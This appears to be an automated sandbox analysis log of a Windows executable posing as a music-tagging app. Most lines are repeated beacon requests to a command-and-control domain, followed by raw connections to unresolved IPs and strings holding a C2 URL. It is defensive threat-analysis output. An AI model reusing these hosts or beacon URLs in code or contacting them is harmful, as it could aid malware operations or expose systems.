        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: unknown | TCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknown | UDP traffic detected without corresponding DNS query: 141.98.234.31
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Code function: 4_2_02AD72A7 Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,_memset,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,_memset,_memset,_memset,_malloc,_memset,_strtok,_swscanf,_strtok,_free,Sleep,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_memset,_free, | 4_2_02AD72A7
        Source: global traffic | HTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ffe16c1ef909339 HTTP/1.1 | Host: csoodgx.net | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: unknown DNS traffic detected: queries for: csoodgx.net
        Source: metatoggermusiccollection.exe, 00000004.00000002.3215694991.0000000000871000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.142.214.240/
        Source: metatoggermusiccollection.exe, 00000004.00000002.3216869641.0000000003390000.00000004.00000020.00020000.00000000.sdmp, metatoggermusiccollection.exe, 00000004.00000002.3216976399.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, metatoggermusiccollection.exe, 00000004.00000002.3215694991.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.142.214.240/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e99586
        Source: metatoggermusiccollection.exe, 00000004.00000002.3215694991.0000000000871000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.142.214.240/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df
        Source: is-QO8P8.tmp.1.dr String found in binary or memory: http://mingw-w64.sourceforge.net/X
